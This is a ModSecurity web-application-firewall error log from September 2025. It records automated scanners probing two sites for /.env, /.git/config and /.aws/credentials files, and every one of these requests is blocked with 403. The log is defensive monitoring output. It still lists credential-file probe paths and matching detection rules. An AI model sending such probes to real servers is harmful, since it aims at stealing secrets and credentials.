[Sun Sep 21 19:36:20.727047 2025] [:error] [pid 2907325] [client 196.251.70.47:32956] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNA3lFrGS2vP_CNd6NeWlwAAAA8"]
[Mon Sep 22 02:29:19.112316 2025] [:error] [pid 2916312] [client 15.220.17.183:56544] [client 15.220.17.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNCYX3fc_K_h4UWazxDZnAAAAAw"]
[Mon Sep 22 02:29:19.112575 2025] [:error] [pid 2916312] [client 15.220.17.183:56544] [client 15.220.17.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNCYX3fc_K_h4UWazxDZnAAAAAw"]
[Mon Sep 22 02:29:19.112754 2025] [:error] [pid 2916312] [client 15.220.17.183:56544] [client 15.220.17.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNCYX3fc_K_h4UWazxDZnAAAAAw"]
[Mon Sep 22 02:29:25.232797 2025] [:error] [pid 2916310] [client 15.220.17.183:62440] [client 15.220.17.183] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNCYZZhF5M3Z7pEWP_mb-gAAAAs"]
[Mon Sep 22 02:29:25.233050 2025] [:error] [pid 2916310] [client 15.220.17.183:62440] [client 15.220.17.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNCYZZhF5M3Z7pEWP_mb-gAAAAs"]
[Mon Sep 22 02:29:25.233217 2025] [:error] [pid 2916310] [client 15.220.17.183:62440] [client 15.220.17.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNCYZZhF5M3Z7pEWP_mb-gAAAAs"]
[Mon Sep 22 12:44:54.133959 2025] [:error] [pid 2928309] [client 3.138.185.30:34435] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aNEoph1JLimcQRHNbAaD0AAAAAU"]
[Mon Sep 22 12:44:54.134556 2025] [:error] [pid 2928309] [client 3.138.185.30:34435] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aNEoph1JLimcQRHNbAaD0AAAAAU"]
[Mon Sep 22 12:44:54.134789 2025] [:error] [pid 2928309] [client 3.138.185.30:34435] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aNEoph1JLimcQRHNbAaD0AAAAAU"]
[Mon Sep 22 22:21:11.129228 2025] [:error] [pid 2923419] [client 45.130.203.185:58945] [client 45.130.203.185] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNGvt6PHs2zrUwRS0lTSeQAAAAw"]
[Mon Sep 22 22:21:11.129437 2025] [:error] [pid 2923419] [client 45.130.203.185:58945] [client 45.130.203.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNGvt6PHs2zrUwRS0lTSeQAAAAw"]
[Mon Sep 22 22:21:11.129586 2025] [:error] [pid 2923419] [client 45.130.203.185:58945] [client 45.130.203.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNGvt6PHs2zrUwRS0lTSeQAAAAw"]
[Mon Sep 22 22:21:11.391770 2025] [:error] [pid 2930299] [client 45.130.203.207:30397] [client 45.130.203.207] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvt3qQ0MwqIDZI0eOecAAAAAc"]
[Mon Sep 22 22:21:11.391981 2025] [:error] [pid 2930299] [client 45.130.203.207:30397] [client 45.130.203.207] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvt3qQ0MwqIDZI0eOecAAAAAc"]
[Mon Sep 22 22:21:11.392148 2025] [:error] [pid 2930299] [client 45.130.203.207:30397] [client 45.130.203.207] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvt3qQ0MwqIDZI0eOecAAAAAc"]
[Mon Sep 22 22:21:11.497226 2025] [:error] [pid 2928309] [client 45.130.203.214:38219] [client 45.130.203.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvtx1JLimcQRHNbAaEPwAAAAU"]
[Mon Sep 22 22:21:11.497470 2025] [:error] [pid 2928309] [client 45.130.203.214:38219] [client 45.130.203.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvtx1JLimcQRHNbAaEPwAAAAU"]
[Mon Sep 22 22:21:11.497986 2025] [:error] [pid 2928309] [client 45.130.203.214:38219] [client 45.130.203.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNGvtx1JLimcQRHNbAaEPwAAAAU"]
[Tue Sep 23 07:59:25.954401 2025] [:error] [pid 2942734] [client 45.139.104.218:55570] [client 45.139.104.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNI3PV7fCJzQKd5kIG3fRwAAAAM"]
[Tue Sep 23 07:59:25.954688 2025] [:error] [pid 2942734] [client 45.139.104.218:55570] [client 45.139.104.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNI3PV7fCJzQKd5kIG3fRwAAAAM"]
[Tue Sep 23 07:59:25.954848 2025] [:error] [pid 2942734] [client 45.139.104.218:55570] [client 45.139.104.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNI3PV7fCJzQKd5kIG3fRwAAAAM"]
[Wed Sep 24 10:03:00.264310 2025] [:error] [pid 2967876] [client 185.177.72.21:49208] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNOltHoWlOcrWlWRQStC2AAAAAI"]
[Wed Sep 24 10:03:00.264620 2025] [:error] [pid 2967876] [client 185.177.72.21:49208] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNOltHoWlOcrWlWRQStC2AAAAAI"]
[Wed Sep 24 10:03:00.264852 2025] [:error] [pid 2967876] [client 185.177.72.21:49208] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNOltHoWlOcrWlWRQStC2AAAAAI"]
[Wed Sep 24 10:03:00.507894 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNOltG11z64ratYfmCBJZQAAAAY"]
[Wed Sep 24 10:03:00.508168 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNOltG11z64ratYfmCBJZQAAAAY"]
[Wed Sep 24 10:03:00.508359 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNOltG11z64ratYfmCBJZQAAAAY"]
[Wed Sep 24 10:03:00.532731 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNOltG11z64ratYfmCBJZgAAAAY"]
[Wed Sep 24 10:03:00.532939 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNOltG11z64ratYfmCBJZgAAAAY"]
[Wed Sep 24 10:03:00.533104 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNOltG11z64ratYfmCBJZgAAAAY"]
[Wed Sep 24 10:03:00.557467 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNOltG11z64ratYfmCBJZwAAAAY"]
[Wed Sep 24 10:03:00.557675 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNOltG11z64ratYfmCBJZwAAAAY"]
[Wed Sep 24 10:03:00.557897 2025] [:error] [pid 2969073] [client 185.177.72.21:49220] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNOltG11z64ratYfmCBJZwAAAAY"]
[Wed Sep 24 21:51:14.589465 2025] [:error] [pid 2967876] [client 18.89.140.40:50097] [client 18.89.140.40] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNRLsnoWlOcrWlWRQStDSgAAAAI"]
[Wed Sep 24 21:51:14.590594 2025] [:error] [pid 2967876] [client 18.89.140.40:50097] [client 18.89.140.40] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNRLsnoWlOcrWlWRQStDSgAAAAI"]
[Wed Sep 24 21:51:14.590790 2025] [:error] [pid 2967876] [client 18.89.140.40:50097] [client 18.89.140.40] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNRLsnoWlOcrWlWRQStDSgAAAAI"]
[Wed Sep 24 21:51:20.954334 2025] [:error] [pid 2972445] [client 18.89.140.40:49462] [client 18.89.140.40] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNRLuLQ1w_nEqnJsngh6ZgAAAAc"]
[Wed Sep 24 21:51:20.954598 2025] [:error] [pid 2972445] [client 18.89.140.40:49462] [client 18.89.140.40] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNRLuLQ1w_nEqnJsngh6ZgAAAAc"]
[Wed Sep 24 21:51:20.954757 2025] [:error] [pid 2972445] [client 18.89.140.40:49462] [client 18.89.140.40] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNRLuLQ1w_nEqnJsngh6ZgAAAAc"]
